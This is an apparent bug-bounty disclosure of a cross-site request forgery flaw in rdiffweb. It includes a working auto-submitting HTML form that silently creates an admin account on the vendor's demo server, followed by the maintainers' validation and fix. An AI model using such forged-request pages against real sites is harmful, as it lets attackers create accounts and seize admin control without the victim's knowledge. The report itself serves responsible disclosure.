Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb

Valid

Reported on

Sep 11th 2021


✍️ Description

Hello dear Rdiffweb team.

I found a CSRF vulnerability on following endpoint that attackers able to Create users with PoC.html

🕵️‍♂️ Proof of Concept

  1. User with right privileges should be logged in Firefox or Safari.

  2. Users go to a website that contain PoC.html

3.after visiting attacker's website a admin user with username aaaa will be created. // PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://rdiffweb-demo.ikus-soft.com/admin/users" method="POST">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="username" value="aaaa" />
      <input type="hidden" name="email" value="ad&#64;mm&#46;com" />
      <input type="hidden" name="password" value="admin123" />
      <input type="hidden" name="user&#95;root" value="aaaa" />
      <input type="hidden" name="role" value="0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Also attacker can send multiple request with help of Iframes.

Fix

I just want to suggest you to set a CSRF token for this form.

Z-Old
a year ago

Admin


Hey amammad, I've opened a PR on the repo asking for a security policy with email.

amammad
a year ago

Researcher


hey @maintainer can you validate this report too? thanks

Patrik Dufresne validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrik Dufresne marked this as fixed with commit 0eba3b a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
amammad
a year ago

Researcher


thanks a lot @maintainer

and sorry if there is some distribution today.

to join this conversation